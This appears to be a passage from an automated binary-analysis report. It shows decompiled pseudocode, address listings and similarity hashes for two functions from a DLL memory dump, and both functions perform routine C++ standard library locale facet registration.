0x6dddfb9b
0x6dddfb9f
0x6dddfbac
0x6dddfbb4
0x6dddfbb6
0x00000000
0x6dddfbb6
0x6dddfb7d
0x6dddfb7d
0x00000000
0x6dddfb7d
0x6dddfb7b
0x6dddfaee
0x6dddfaee
0x6dddfaf1
0x6dddfaf5
0x6dddfaf9
0x6dddfb06
0x6dddfb0e
0x6dddfb10
0x00000000
0x6dddfb10
0x6dddfad7
0x6dddfad7
0x00000000
0x6dddfad7
0x6dddfad5
0x6dddfa48
0x6dddfa48
0x6dddfa4b
0x6dddfa4f
0x6dddfa53
0x6dddfa60
0x6dddfa68
0x6dddfa6a
0x00000000
0x6dddfa6a
0x6dddfa31
0x6dddfa31
0x00000000
0x6dddfa31
0x6dddfa2f
0x6dddf9a2
0x6dddf9a2
0x6dddf9a5
0x6dddf9a9
0x6dddf9ad
0x6dddf9ba
0x6dddf9c2
0x6dddf9c4
0x00000000
0x6dddf9c4
0x6dddf98b
0x6dddf98b
0x00000000
0x6dddf98b
0x6dddf989

APIs

__EH_prolog3.LIBCMT ref: 6DDDF952
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDF95C
int.LIBCPMT ref: 6DDDF973

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDDF9AD
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDF9CD
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDF9EB

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 1abbece07f55f0891d131b4eb78591395ea21907e46d7f4c414cc5a86bd859d6
Instruction ID: fe127b5d29b24984ca32e0db06c4e73b001b37d174a637273c0f848458037c65
Opcode Fuzzy Hash: 1abbece07f55f0891d131b4eb78591395ea21907e46d7f4c414cc5a86bd859d6
Instruction Fuzzy Hash: 0C11C275D08269DBCF01FB64C850AFDB775AF54318F26400AF615AB290DF749A018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDEB93E, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6DDEB93E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t83;
				signed int _t84;
				void* _t96;
				void* _t109;
				void* _t122;
				void* _t135;
				signed int _t207;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed int _t236;
				void* _t242;

				_t223 = __edx;
				_t172 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t242 - 0x14, 0);
				_t231 =  *0x6de96e34; // 0x0
				 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
				 *(_t242 - 0x10) = _t231;
				_t83 = E6DDB161C(0x6de96e14);
				_t175 =  *((intOrPtr*)(_t242 + 8));
				_t84 = E6DDB171B( *((intOrPtr*)(_t242 + 8)), _t83);
				_t225 = _t84;
				if(_t84 != 0) {
					L5:
					E6DDD66BA(_t242 - 0x14);
					return E6DDF0075(_t225);
				} else {
					if(_t231 == 0) {
						_push( *((intOrPtr*)(_t242 + 8)));
						_push(_t242 - 0x10);
						__eflags = E6DDEC0B8(__ebx, _t175, __edx, _t225, _t231) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t242 - 0x20);
							E6DDF3D74(_t242 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t225, _t231, 0x14);
							E6DDD6653(_t242 - 0x14, 0);
							_t232 =  *0x6de96e3c; // 0x0
							 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
							 *(_t242 - 0x10) = _t232;
							_t96 = E6DDB161C(0x6de96e1c);
							_t182 =  *((intOrPtr*)(_t242 + 8));
							_t226 = E6DDB171B( *((intOrPtr*)(_t242 + 8)), _t96);
							__eflags = _t226;
							if(_t226 != 0) {
								L12:
								E6DDD66BA(_t242 - 0x14);
								return E6DDF0075(_t226);
							} else {
								__eflags = _t232;
								if(_t232 == 0) {
									_push( *((intOrPtr*)(_t242 + 8)));
									_push(_t242 - 0x10);
									__eflags = E6DDEC120(_t172, _t182, __edx, _t226, _t232) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t242 - 0x20);
										E6DDF3D74(_t242 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t172, _t226, _t232, 0x14);
										E6DDD6653(_t242 - 0x14, 0);
										_t233 =  *0x6de96e38; // 0x0
										 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
										 *(_t242 - 0x10) = _t233;
										_t109 = E6DDB161C(0x6de96e18);
										_t189 =  *((intOrPtr*)(_t242 + 8));
										_t227 = E6DDB171B( *((intOrPtr*)(_t242 + 8)), _t109);
										__eflags = _t227;
										if(_t227 != 0) {
											L19:
											E6DDD66BA(_t242 - 0x14);
											return E6DDF0075(_t227);
										} else {
											__eflags = _t233;
											if(_t233 == 0) {
												_push( *((intOrPtr*)(_t242 + 8)));
												_push(_t242 - 0x10);
												__eflags = E6DDEC1A4(_t172, _t189, __edx, _t227, _t233) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438(_t242 - 0x20);
													E6DDF3D74(_t242 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t172, _t227, _t233, 0x14);
													E6DDD6653(_t242 - 0x14, 0);
													_t234 =  *0x6de96e40; // 0x0
													 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
													 *(_t242 - 0x10) = _t234;
													_t122 = E6DDB161C(0x6de96e20);
													_t196 =  *((intOrPtr*)(_t242 + 8));
													_t228 = E6DDB171B( *((intOrPtr*)(_t242 + 8)), _t122);
													__eflags = _t228;
													if(_t228 != 0) {
														L26:
														E6DDD66BA(_t242 - 0x14);
														return E6DDF0075(_t228);
													} else {
														__eflags = _t234;
														if(_t234 == 0) {
															_push( *((intOrPtr*)(_t242 + 8)));
															_push(_t242 - 0x10);
															__eflags = E6DDEC229(_t172, _t196, _t223, _t228, _t234) - 0xffffffff;
															if(__eflags == 0) {
																E6DDB1438(_t242 - 0x20);
																E6DDF3D74(_t242 - 0x20, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de383cf, _t172, _t228, _t234, 0x14);
																E6DDD6653(_t242 - 0x14, 0);
																_t235 =  *0x6de96e44; // 0x0
																 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
																 *(_t242 - 0x10) = _t235;
																_t135 = E6DDB161C(0x6de96e24);
																_t203 =  *((intOrPtr*)(_t242 + 8));
																_t229 = E6DDB171B( *((intOrPtr*)(_t242 + 8)), _t135);
																__eflags = _t229;
																if(_t229 != 0) {
																	L33:
																	E6DDD66BA(_t242 - 0x14);
																	return E6DDF0075(_t229);
																} else {
																	__eflags = _t235;
																	if(_t235 == 0) {
																		_push( *((intOrPtr*)(_t242 + 8)));
																		_push(_t242 - 0x10);
																		__eflags = E6DDEC295(_t172, _t203, _t223, _t229, _t235) - 0xffffffff;
																		if(__eflags == 0) {
																			_t207 = _t242 - 0x20;
																			E6DDB1438(_t207);
																			E6DDF3D74(_t242 - 0x20, 0x6de93504);
																			asm("int3");
																			E6DDF00AC(0x6de3851f, _t172, _t229, _t235, 4);
																			_t236 = _t207;
																			 *(_t242 - 0x10) = _t236;
																			 *((intOrPtr*)(_t236 + 4)) =  *((intOrPtr*)(_t242 + 0xc));
																			_push( *((intOrPtr*)(_t242 + 0x14)));
																			_t77 = _t242 - 4;
																			 *_t77 =  *(_t242 - 4) & 0x00000000;
																			__eflags =  *_t77;
																			 *_t236 = 0x6de3c414;
																			 *((char*)(_t236 + 0x28)) =  *((intOrPtr*)(_t242 + 0x10));
																			E6DDED028(_t172, _t207, _t223, _t229, _t236,  *_t77);
																			return E6DDF0075(_t236,  *((intOrPtr*)(_t242 + 8)));
																		} else {
																			_t229 =  *(_t242 - 0x10);
																			 *(_t242 - 0x10) = _t229;
																			 *(_t242 - 4) = 1;
																			E6DDD6FD3(__eflags, _t229);
																			 *0x6de3a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t229 + 4))))();
																			 *0x6de96e44 = _t229;
																			goto L33;
																		}
																	} else {
																		_t229 = _t235;
																		goto L33;
																	}
																}
															} else {
																_t228 =  *(_t242 - 0x10);
																 *(_t242 - 0x10) = _t228;
																 *(_t242 - 4) = 1;
																E6DDD6FD3(__eflags, _t228);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t228 + 4))))();
																 *0x6de96e40 = _t228;
																goto L26;
															}
														} else {
															_t228 = _t234;
															goto L26;
														}
													}
												} else {
													_t227 =  *(_t242 - 0x10);
													 *(_t242 - 0x10) = _t227;
													 *(_t242 - 4) = 1;
													E6DDD6FD3(__eflags, _t227);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t227 + 4))))();
													 *0x6de96e38 = _t227;
													goto L19;
												}
											} else {
												_t227 = _t233;
												goto L19;
											}
										}
									} else {
										_t226 =  *(_t242 - 0x10);
										 *(_t242 - 0x10) = _t226;
										 *(_t242 - 4) = 1;
										E6DDD6FD3(__eflags, _t226);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t226 + 4))))();
										 *0x6de96e3c = _t226;
										goto L12;
									}
								} else {
									_t226 = _t232;
									goto L12;
								}
							}
						} else {
							_t225 =  *(_t242 - 0x10);
							 *(_t242 - 0x10) = _t225;
							 *(_t242 - 4) = 1;
							E6DDD6FD3(__eflags, _t225);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t225 + 4))))();
							 *0x6de96e34 = _t225;
							goto L5;
						}
					} else {
						_t225 = _t231;
						goto L5;
					}
				}
			}

0x6ddeb93e
0x6ddeb93e
0x6ddeb945
0x6ddeb94f
0x6ddeb954
0x6ddeb95f
0x6ddeb963
0x6ddeb966
0x6ddeb96b
0x6ddeb96f
0x6ddeb974
0x6ddeb978
0x6ddeb9bd
0x6ddeb9c0
0x6ddeb9cc
0x6ddeb97a
0x6ddeb97c
0x6ddeb982
0x6ddeb988
0x6ddeb990
0x6ddeb993
0x6ddeb9d0
0x6ddeb9de
0x6ddeb9e3
0x6ddeb9eb
0x6ddeb9f5
0x6ddeb9fa
0x6ddeba05
0x6ddeba09
0x6ddeba0c
0x6ddeba11
0x6ddeba1a
0x6ddeba1c
0x6ddeba1e
0x6ddeba63
0x6ddeba66
0x6ddeba72
0x6ddeba20
0x6ddeba20
0x6ddeba22
0x6ddeba28
0x6ddeba2e
0x6ddeba36
0x6ddeba39
0x6ddeba76
0x6ddeba84
0x6ddeba89
0x6ddeba91
0x6ddeba9b
0x6ddebaa0
0x6ddebaab
0x6ddebaaf
0x6ddebab2
0x6ddebab7
0x6ddebac0
0x6ddebac2
0x6ddebac4
0x6ddebb09
0x6ddebb0c
0x6ddebb18
0x6ddebac6
0x6ddebac6
0x6ddebac8
0x6ddebace
0x6ddebad4
0x6ddebadc
0x6ddebadf
0x6ddebb1c
0x6ddebb2a
0x6ddebb2f
0x6ddebb37
0x6ddebb41
0x6ddebb46
0x6ddebb51
0x6ddebb55
0x6ddebb58
0x6ddebb5d
0x6ddebb66
0x6ddebb68
0x6ddebb6a
0x6ddebbaf
0x6ddebbb2
0x6ddebbbe
0x6ddebb6c
0x6ddebb6c
0x6ddebb6e
0x6ddebb74
0x6ddebb7a
0x6ddebb82
0x6ddebb85
0x6ddebbc2
0x6ddebbd0
0x6ddebbd5
0x6ddebbdd
0x6ddebbe7
0x6ddebbec
0x6ddebbf7
0x6ddebbfb
0x6ddebbfe
0x6ddebc03
0x6ddebc0c
0x6ddebc0e
0x6ddebc10
0x6ddebc55
0x6ddebc58
0x6ddebc64
0x6ddebc12
0x6ddebc12
0x6ddebc14
0x6ddebc1a
0x6ddebc20
0x6ddebc28
0x6ddebc2b
0x6ddebc65
0x6ddebc68
0x6ddebc76
0x6ddebc7b
0x6ddebc83
0x6ddebc88
0x6ddebc8a
0x6ddebc90
0x6ddebc93
0x6ddebc9c
0x6ddebc9c
0x6ddebc9c
0x6ddebca0
0x6ddebca6
0x6ddebca9
0x6ddebcb5
0x6ddebc2d
0x6ddebc2d
0x6ddebc30
0x6ddebc34
0x6ddebc38
0x6ddebc45
0x6ddebc4d
0x6ddebc4f
0x00000000
0x6ddebc4f
0x6ddebc16
0x6ddebc16
0x00000000
0x6ddebc16
0x6ddebc14
0x6ddebb87
0x6ddebb87
0x6ddebb8a
0x6ddebb8e
0x6ddebb92
0x6ddebb9f
0x6ddebba7
0x6ddebba9
0x00000000
0x6ddebba9
0x6ddebb70
0x6ddebb70
0x00000000
0x6ddebb70
0x6ddebb6e
0x6ddebae1
0x6ddebae1
0x6ddebae4
0x6ddebae8
0x6ddebaec
0x6ddebaf9
0x6ddebb01
0x6ddebb03
0x00000000
0x6ddebb03
0x6ddebaca
0x6ddebaca
0x00000000
0x6ddebaca
0x6ddebac8
0x6ddeba3b
0x6ddeba3b
0x6ddeba3e
0x6ddeba42
0x6ddeba46
0x6ddeba53
0x6ddeba5b
0x6ddeba5d
0x00000000
0x6ddeba5d
0x6ddeba24
0x6ddeba24
0x00000000
0x6ddeba24
0x6ddeba22
0x6ddeb995
0x6ddeb995
0x6ddeb998
0x6ddeb99c
0x6ddeb9a0
0x6ddeb9ad
0x6ddeb9b5
0x6ddeb9b7
0x00000000
0x6ddeb9b7
0x6ddeb97e
0x6ddeb97e
0x00000000
0x6ddeb97e
0x6ddeb97c

APIs

__EH_prolog3.LIBCMT ref: 6DDEB945
std::_Lockit::_Lockit.LIBCPMT ref: 6DDEB94F
int.LIBCPMT ref: 6DDEB966

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDEB9A0
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDEB9C0
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDEB9DE

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 06c9a54adadb8a15e066d89bdadf3091825147d796f2cfa3d07c8c1fd711e274
Instruction ID: db4d7238e819ca79a88e19719a686464c8a51c9d0a5031ed69b9c4a305430bbd
Opcode Fuzzy Hash: 06c9a54adadb8a15e066d89bdadf3091825147d796f2cfa3d07c8c1fd711e274
Instruction Fuzzy Hash: E311A075809619DBCF01FB64C850AFDB7B4AF45318F270009F611AB290DF74AA01CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDEB898, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6DDEB898(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t97;
				signed int _t98;
				void* _t110;
				void* _t123;
				void* _t136;
				void* _t149;
				void* _t162;
				signed int _t245;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				signed int _t277;
				signed int _t278;
				signed int _t279;
				void* _t286;

				_t264 = __edx;
				_t203 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t286 - 0x14, 0);
				_t273 =  *0x6de96e30; // 0x0
				 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
				 *(_t286 - 0x10) = _t273;
				_t97 = E6DDB161C(0x6de96e10);
				_t206 =  *((intOrPtr*)(_t286 + 8));
				_t98 = E6DDB171B( *((intOrPtr*)(_t286 + 8)), _t97);
				_t266 = _t98;
				if(_t98 != 0) {
					L5:
					E6DDD66BA(_t286 - 0x14);
					return E6DDF0075(_t266);
				} else {
					if(_t273 == 0) {
						_push( *((intOrPtr*)(_t286 + 8)));
						_push(_t286 - 0x10);
						__eflags = E6DDEC050(__ebx, _t206, __edx, _t266, _t273) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t286 - 0x20);
							E6DDF3D74(_t286 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t266, _t273, 0x14);
							E6DDD6653(_t286 - 0x14, 0);
							_t274 =  *0x6de96e34; // 0x0
							 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
							 *(_t286 - 0x10) = _t274;
							_t110 = E6DDB161C(0x6de96e14);
							_t213 =  *((intOrPtr*)(_t286 + 8));
							_t267 = E6DDB171B( *((intOrPtr*)(_t286 + 8)), _t110);
							__eflags = _t267;
							if(_t267 != 0) {
								L12:
								E6DDD66BA(_t286 - 0x14);
								return E6DDF0075(_t267);
							} else {
								__eflags = _t274;
								if(_t274 == 0) {
									_push( *((intOrPtr*)(_t286 + 8)));
									_push(_t286 - 0x10);
									__eflags = E6DDEC0B8(_t203, _t213, __edx, _t267, _t274) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t286 - 0x20);
										E6DDF3D74(_t286 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t203, _t267, _t274, 0x14);
										E6DDD6653(_t286 - 0x14, 0);
										_t275 =  *0x6de96e3c; // 0x0
										 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
										 *(_t286 - 0x10) = _t275;
										_t123 = E6DDB161C(0x6de96e1c);
										_t220 =  *((intOrPtr*)(_t286 + 8));
										_t268 = E6DDB171B( *((intOrPtr*)(_t286 + 8)), _t123);
										__eflags = _t268;
										if(_t268 != 0) {
											L19:
											E6DDD66BA(_t286 - 0x14);
											return E6DDF0075(_t268);
										} else {
											__eflags = _t275;
											if(_t275 == 0) {
												_push( *((intOrPtr*)(_t286 + 8)));
												_push(_t286 - 0x10);
												__eflags = E6DDEC120(_t203, _t220, __edx, _t268, _t275) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438(_t286 - 0x20);
													E6DDF3D74(_t286 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t203, _t268, _t275, 0x14);
													E6DDD6653(_t286 - 0x14, 0);
													_t276 =  *0x6de96e38; // 0x0
													 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
													 *(_t286 - 0x10) = _t276;
													_t136 = E6DDB161C(0x6de96e18);
													_t227 =  *((intOrPtr*)(_t286 + 8));
													_t269 = E6DDB171B( *((intOrPtr*)(_t286 + 8)), _t136);
													__eflags = _t269;
													if(_t269 != 0) {
														L26:
														E6DDD66BA(_t286 - 0x14);
														return E6DDF0075(_t269);
													} else {
														__eflags = _t276;
														if(_t276 == 0) {
															_push( *((intOrPtr*)(_t286 + 8)));
															_push(_t286 - 0x10);
															__eflags = E6DDEC1A4(_t203, _t227, _t264, _t269, _t276) - 0xffffffff;
															if(__eflags == 0) {
																E6DDB1438(_t286 - 0x20);
																E6DDF3D74(_t286 - 0x20, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de383cf, _t203, _t269, _t276, 0x14);
																E6DDD6653(_t286 - 0x14, 0);
																_t277 =  *0x6de96e40; // 0x0
																 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
																 *(_t286 - 0x10) = _t277;
																_t149 = E6DDB161C(0x6de96e20);
																_t234 =  *((intOrPtr*)(_t286 + 8));
																_t270 = E6DDB171B( *((intOrPtr*)(_t286 + 8)), _t149);
																__eflags = _t270;
																if(_t270 != 0) {
																	L33:
																	E6DDD66BA(_t286 - 0x14);
																	return E6DDF0075(_t270);
																} else {
																	__eflags = _t277;
																	if(_t277 == 0) {
																		_push( *((intOrPtr*)(_t286 + 8)));
																		_push(_t286 - 0x10);
																		__eflags = E6DDEC229(_t203, _t234, _t264, _t270, _t277) - 0xffffffff;
																		if(__eflags == 0) {
																			E6DDB1438(_t286 - 0x20);
																			E6DDF3D74(_t286 - 0x20, 0x6de93504);
																			asm("int3");
																			E6DDF00AC(0x6de383cf, _t203, _t270, _t277, 0x14);
																			E6DDD6653(_t286 - 0x14, 0);
																			_t278 =  *0x6de96e44; // 0x0
																			 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
																			 *(_t286 - 0x10) = _t278;
																			_t162 = E6DDB161C(0x6de96e24);
																			_t241 =  *((intOrPtr*)(_t286 + 8));
																			_t271 = E6DDB171B( *((intOrPtr*)(_t286 + 8)), _t162);
																			__eflags = _t271;
																			if(_t271 != 0) {
																				L40:
																				E6DDD66BA(_t286 - 0x14);
																				return E6DDF0075(_t271);
																			} else {
																				__eflags = _t278;
																				if(_t278 == 0) {
																					_push( *((intOrPtr*)(_t286 + 8)));
																					_push(_t286 - 0x10);
																					__eflags = E6DDEC295(_t203, _t241, _t264, _t271, _t278) - 0xffffffff;
																					if(__eflags == 0) {
																						_t245 = _t286 - 0x20;
																						E6DDB1438(_t245);
																						E6DDF3D74(_t286 - 0x20, 0x6de93504);
																						asm("int3");
																						E6DDF00AC(0x6de3851f, _t203, _t271, _t278, 4);
																						_t279 = _t245;
																						 *(_t286 - 0x10) = _t279;
																						 *((intOrPtr*)(_t279 + 4)) =  *((intOrPtr*)(_t286 + 0xc));
																						_push( *((intOrPtr*)(_t286 + 0x14)));
																						_t91 = _t286 - 4;
																						 *_t91 =  *(_t286 - 4) & 0x00000000;
																						__eflags =  *_t91;
																						 *_t279 = 0x6de3c414;
																						 *((char*)(_t279 + 0x28)) =  *((intOrPtr*)(_t286 + 0x10));
																						E6DDED028(_t203, _t245, _t264, _t271, _t279,  *_t91);
																						return E6DDF0075(_t279,  *((intOrPtr*)(_t286 + 8)));
																					} else {
																						_t271 =  *(_t286 - 0x10);
																						 *(_t286 - 0x10) = _t271;
																						 *(_t286 - 4) = 1;
																						E6DDD6FD3(__eflags, _t271);
																						 *0x6de3a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t271 + 4))))();
																						 *0x6de96e44 = _t271;
																						goto L40;
																					}
																				} else {
																					_t271 = _t278;
																					goto L40;
																				}
																			}
																		} else {
																			_t270 =  *(_t286 - 0x10);
																			 *(_t286 - 0x10) = _t270;
																			 *(_t286 - 4) = 1;
																			E6DDD6FD3(__eflags, _t270);
																			 *0x6de3a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t270 + 4))))();
																			 *0x6de96e40 = _t270;
																			goto L33;
																		}
																	} else {
																		_t270 = _t277;
																		goto L33;
																	}
																}
															} else {
																_t269 =  *(_t286 - 0x10);
																 *(_t286 - 0x10) = _t269;
																 *(_t286 - 4) = 1;
																E6DDD6FD3(__eflags, _t269);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t269 + 4))))();
																 *0x6de96e38 = _t269;
																goto L26;
															}
														} else {
															_t269 = _t276;
															goto L26;
														}
													}
												} else {
													_t268 =  *(_t286 - 0x10);
													 *(_t286 - 0x10) = _t268;
													 *(_t286 - 4) = 1;
													E6DDD6FD3(__eflags, _t268);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t268 + 4))))();
													 *0x6de96e3c = _t268;
													goto L19;
												}
											} else {
												_t268 = _t275;
												goto L19;
											}
										}
									} else {
										_t267 =  *(_t286 - 0x10);
										 *(_t286 - 0x10) = _t267;
										 *(_t286 - 4) = 1;
										E6DDD6FD3(__eflags, _t267);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t267 + 4))))();
										 *0x6de96e34 = _t267;
										goto L12;
									}
								} else {
									_t267 = _t274;
									goto L12;
								}
							}
						} else {
							_t266 =  *(_t286 - 0x10);
							 *(_t286 - 0x10) = _t266;
							 *(_t286 - 4) = 1;
							E6DDD6FD3(__eflags, _t266);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t266 + 4))))();
							 *0x6de96e30 = _t266;
							goto L5;
						}
					} else {
						_t266 = _t273;
						goto L5;
					}
				}
			}

0x6ddeb898
0x6ddeb898
0x6ddeb89f
0x6ddeb8a9
0x6ddeb8ae
0x6ddeb8b9
0x6ddeb8bd
0x6ddeb8c0
0x6ddeb8c5
0x6ddeb8c9
0x6ddeb8ce
0x6ddeb8d2
0x6ddeb917
0x6ddeb91a
0x6ddeb926
0x6ddeb8d4
0x6ddeb8d6
0x6ddeb8dc
0x6ddeb8e2
0x6ddeb8ea
0x6ddeb8ed
0x6ddeb92a
0x6ddeb938
0x6ddeb93d
0x6ddeb945
0x6ddeb94f
0x6ddeb954
0x6ddeb95f
0x6ddeb963
0x6ddeb966
0x6ddeb96b
0x6ddeb974
0x6ddeb976
0x6ddeb978
0x6ddeb9bd
0x6ddeb9c0
0x6ddeb9cc
0x6ddeb97a
0x6ddeb97a
0x6ddeb97c
0x6ddeb982
0x6ddeb988
0x6ddeb990
0x6ddeb993
0x6ddeb9d0
0x6ddeb9de
0x6ddeb9e3
0x6ddeb9eb
0x6ddeb9f5
0x6ddeb9fa
0x6ddeba05
0x6ddeba09
0x6ddeba0c
0x6ddeba11
0x6ddeba1a
0x6ddeba1c
0x6ddeba1e
0x6ddeba63
0x6ddeba66
0x6ddeba72
0x6ddeba20
0x6ddeba20
0x6ddeba22
0x6ddeba28
0x6ddeba2e
0x6ddeba36
0x6ddeba39
0x6ddeba76
0x6ddeba84
0x6ddeba89
0x6ddeba91
0x6ddeba9b
0x6ddebaa0
0x6ddebaab
0x6ddebaaf
0x6ddebab2
0x6ddebab7
0x6ddebac0
0x6ddebac2
0x6ddebac4
0x6ddebb09
0x6ddebb0c
0x6ddebb18
0x6ddebac6
0x6ddebac6
0x6ddebac8
0x6ddebace
0x6ddebad4
0x6ddebadc
0x6ddebadf
0x6ddebb1c
0x6ddebb2a
0x6ddebb2f
0x6ddebb37
0x6ddebb41
0x6ddebb46
0x6ddebb51
0x6ddebb55
0x6ddebb58
0x6ddebb5d
0x6ddebb66
0x6ddebb68
0x6ddebb6a
0x6ddebbaf
0x6ddebbb2
0x6ddebbbe
0x6ddebb6c
0x6ddebb6c
0x6ddebb6e
0x6ddebb74
0x6ddebb7a
0x6ddebb82
0x6ddebb85
0x6ddebbc2
0x6ddebbd0
0x6ddebbd5
0x6ddebbdd
0x6ddebbe7
0x6ddebbec
0x6ddebbf7
0x6ddebbfb
0x6ddebbfe
0x6ddebc03
0x6ddebc0c
0x6ddebc0e
0x6ddebc10
0x6ddebc55
0x6ddebc58
0x6ddebc64
0x6ddebc12
0x6ddebc12
0x6ddebc14
0x6ddebc1a
0x6ddebc20
0x6ddebc28
0x6ddebc2b
0x6ddebc65
0x6ddebc68
0x6ddebc76
0x6ddebc7b
0x6ddebc83
0x6ddebc88
0x6ddebc8a
0x6ddebc90
0x6ddebc93
0x6ddebc9c
0x6ddebc9c
0x6ddebc9c
0x6ddebca0
0x6ddebca6
0x6ddebca9
0x6ddebcb5
0x6ddebc2d
0x6ddebc2d
0x6ddebc30
0x6ddebc34
0x6ddebc38
0x6ddebc45
0x6ddebc4d
0x6ddebc4f
0x00000000
0x6ddebc4f
0x6ddebc16
0x6ddebc16
0x00000000
0x6ddebc16
0x6ddebc14
0x6ddebb87
0x6ddebb87
0x6ddebb8a
0x6ddebb8e
0x6ddebb92
0x6ddebb9f
0x6ddebba7
0x6ddebba9
0x00000000
0x6ddebba9
0x6ddebb70
0x6ddebb70
0x00000000
0x6ddebb70
0x6ddebb6e
0x6ddebae1
0x6ddebae1
0x6ddebae4
0x6ddebae8
0x6ddebaec
0x6ddebaf9
0x6ddebb01
0x6ddebb03
0x00000000
0x6ddebb03
0x6ddebaca
0x6ddebaca
0x00000000
0x6ddebaca
0x6ddebac8
0x6ddeba3b
0x6ddeba3b
0x6ddeba3e
0x6ddeba42
0x6ddeba46
0x6ddeba53
0x6ddeba5b
0x6ddeba5d
0x00000000
0x6ddeba5d
0x6ddeba24
0x6ddeba24
0x00000000
0x6ddeba24
0x6ddeba22
0x6ddeb995
0x6ddeb995
0x6ddeb998
0x6ddeb99c
0x6ddeb9a0
0x6ddeb9ad
0x6ddeb9b5
0x6ddeb9b7
0x00000000
0x6ddeb9b7
0x6ddeb97e
0x6ddeb97e
0x00000000
0x6ddeb97e
0x6ddeb97c
0x6ddeb8ef
0x6ddeb8ef
0x6ddeb8f2
0x6ddeb8f6
0x6ddeb8fa
0x6ddeb907
0x6ddeb90f
0x6ddeb911
0x00000000
0x6ddeb911
0x6ddeb8d8
0x6ddeb8d8
0x00000000
0x6ddeb8d8
0x6ddeb8d6

APIs

__EH_prolog3.LIBCMT ref: 6DDEB89F
std::_Lockit::_Lockit.LIBCPMT ref: 6DDEB8A9
int.LIBCPMT ref: 6DDEB8C0

